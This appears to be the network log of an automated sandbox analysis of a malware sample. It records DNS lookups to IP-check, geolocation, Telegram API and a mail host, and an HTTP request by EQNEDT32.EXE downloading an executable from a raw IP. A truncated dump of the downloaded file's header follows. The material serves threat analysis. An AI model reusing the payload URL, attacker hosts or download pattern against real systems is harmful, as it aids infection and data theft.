                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.475591898 CEST8.8.8.8192.168.2.220x67c9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:29.484837055 CEST8.8.8.8192.168.2.220xdd2dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:30.228991032 CEST8.8.8.8192.168.2.220xf6d9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:30.228991032 CEST8.8.8.8192.168.2.220xf6d9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.255779982 CEST8.8.8.8192.168.2.220xc0cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.266483068 CEST8.8.8.8192.168.2.220xda4cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.753287077 CEST8.8.8.8192.168.2.220xf59eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:31.753287077 CEST8.8.8.8192.168.2.220xf59eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.400039911 CEST8.8.8.8192.168.2.220x9708No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:32.410713911 CEST8.8.8.8192.168.2.220xc760No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.331862926 CEST8.8.8.8192.168.2.220xf848No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.331862926 CEST8.8.8.8192.168.2.220xf848No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:33.998795033 CEST8.8.8.8192.168.2.220xa4d3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:34.008224964 CEST8.8.8.8192.168.2.220xfc7aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:35.400599957 CEST8.8.8.8192.168.2.220x14bdNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:35.400599957 CEST8.8.8.8192.168.2.220x14bdNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.058707952 CEST8.8.8.8192.168.2.220x4c04No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:36.067337036 CEST8.8.8.8192.168.2.220x7205No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:37.908869982 CEST8.8.8.8192.168.2.220x9c7eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:37.908869982 CEST8.8.8.8192.168.2.220x9c7eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.595184088 CEST8.8.8.8192.168.2.220xe37fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:38.624263048 CEST8.8.8.8192.168.2.220xa3d1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:39.546693087 CEST8.8.8.8192.168.2.220x7530No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:39.546693087 CEST8.8.8.8192.168.2.220x7530No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.178802013 CEST8.8.8.8192.168.2.220xa9b5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.187988997 CEST8.8.8.8192.168.2.220xbe6eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.665707111 CEST8.8.8.8192.168.2.220xd5c4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:40.665707111 CEST8.8.8.8192.168.2.220xd5c4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:41.288538933 CEST8.8.8.8192.168.2.220x14e2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:19:58.405874968 CEST8.8.8.8192.168.2.220x4102No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:03.569721937 CEST8.8.8.8192.168.2.220xb364No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:15.832356930 CEST8.8.8.8192.168.2.220x77cbNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.353182077 CEST8.8.8.8192.168.2.220x4336No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.360304117 CEST8.8.8.8192.168.2.220x4336No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.367763042 CEST8.8.8.8192.168.2.220x4336No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.375001907 CEST8.8.8.8192.168.2.220x4336No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.402622938 CEST8.8.8.8192.168.2.220x4336No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.641184092 CEST8.8.8.8192.168.2.220xbf35No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.675951004 CEST8.8.8.8192.168.2.220xbf35No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.683180094 CEST8.8.8.8192.168.2.220xbf35No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.690274000 CEST8.8.8.8192.168.2.220xbf35No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:20:58.697407961 CEST8.8.8.8192.168.2.220xbf35No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.336644888 CEST8.8.8.8192.168.2.220x7afNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.343810081 CEST8.8.8.8192.168.2.220x7afNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.350385904 CEST8.8.8.8192.168.2.220x7afNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.357374907 CEST8.8.8.8192.168.2.220x7afNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:00.365541935 CEST8.8.8.8192.168.2.220x7afNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.930648088 CEST8.8.8.8192.168.2.220x6efeNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.937877893 CEST8.8.8.8192.168.2.220x6efeNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.944807053 CEST8.8.8.8192.168.2.220x6efeNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.967027903 CEST8.8.8.8192.168.2.220x6efeNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:02.974311113 CEST8.8.8.8192.168.2.220x6efeNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.139451027 CEST8.8.8.8192.168.2.220x616cNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.146608114 CEST8.8.8.8192.168.2.220x616cNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.153793097 CEST8.8.8.8192.168.2.220x616cNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.161292076 CEST8.8.8.8192.168.2.220x616cNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.168138981 CEST8.8.8.8192.168.2.220x616cNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.351737976 CEST8.8.8.8192.168.2.220xd70aNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.360160112 CEST8.8.8.8192.168.2.220xd70aNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.367604971 CEST8.8.8.8192.168.2.220xd70aNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.375056028 CEST8.8.8.8192.168.2.220xd70aNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.381688118 CEST8.8.8.8192.168.2.220xd70aNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.654923916 CEST8.8.8.8192.168.2.220xef90No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.661277056 CEST8.8.8.8192.168.2.220xef90No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.668488026 CEST8.8.8.8192.168.2.220xef90No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.675648928 CEST8.8.8.8192.168.2.220xef90No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:03.682908058 CEST8.8.8.8192.168.2.220xef90No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.177917004 CEST8.8.8.8192.168.2.220x5956No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.185512066 CEST8.8.8.8192.168.2.220x5956No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.192739010 CEST8.8.8.8192.168.2.220x5956No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.199989080 CEST8.8.8.8192.168.2.220x5956No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.207165956 CEST8.8.8.8192.168.2.220x5956No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.390434980 CEST8.8.8.8192.168.2.220x44e3No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.397711039 CEST8.8.8.8192.168.2.220x44e3No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.405448914 CEST8.8.8.8192.168.2.220x44e3No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.412259102 CEST8.8.8.8192.168.2.220x44e3No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.419365883 CEST8.8.8.8192.168.2.220x44e3No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.736274958 CEST8.8.8.8192.168.2.220x1a4dNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.742820024 CEST8.8.8.8192.168.2.220x1a4dNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.750003099 CEST8.8.8.8192.168.2.220x1a4dNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.756540060 CEST8.8.8.8192.168.2.220x1a4dNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.763091087 CEST8.8.8.8192.168.2.220x1a4dNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.950901031 CEST8.8.8.8192.168.2.220xf11bNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.958105087 CEST8.8.8.8192.168.2.220xf11bNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.965656996 CEST8.8.8.8192.168.2.220xf11bNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.972901106 CEST8.8.8.8192.168.2.220xf11bNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:07.980240107 CEST8.8.8.8192.168.2.220xf11bNo error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.276721001 CEST8.8.8.8192.168.2.220x7ef5No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.285681009 CEST8.8.8.8192.168.2.220x7ef5No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.292628050 CEST8.8.8.8192.168.2.220x7ef5No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.299113035 CEST8.8.8.8192.168.2.220x7ef5No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:09.306920052 CEST8.8.8.8192.168.2.220x7ef5No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              Sep 26, 2024 09:21:10.622241974 CEST8.8.8.8192.168.2.220x3468No error (0)mail.jhxkgroup.online217.12.218.219A (IP address)IN (0x0001)false
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • 66.63.187.123
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916166.63.187.123803268C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 09:19:21.363132954 CEST324OUTGET /txt/XcsQpLjhNNvxYtrw.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 66.63.187.123
                                              Connection: Keep-Alive
                                              Sep 26, 2024 09:19:22.079797029 CEST1236INHTTP/1.1 200 OK
                                              Server: nginx/1.26.2
                                              Date: Thu, 26 Sep 2024 07:19:21 GMT
                                              Content-Type: application/x-msdos-program
                                              Content-Length: 708096
                                              Connection: keep-alive
                                              Last-Modified: Thu, 26 Sep 2024 03:39:16 GMT
                                              ETag: "ace00-622fd7b9e4c97"
                                              Accept-Ranges: bytes
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa d6 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 0a 00 00 24 00 00 00 00 00 00 9e c6 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c6 0a 00 4f 00 00 00 00 e0 0a 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0$ @ @@LO H.text `.rsrc "@@.reloc @BHY\5, 70|((}{(}(}(}(}(}(}(}*0!( lY mZ(X+*0ms} }#cA} ig}#c} 's}s}}}((8>%,os{{(}
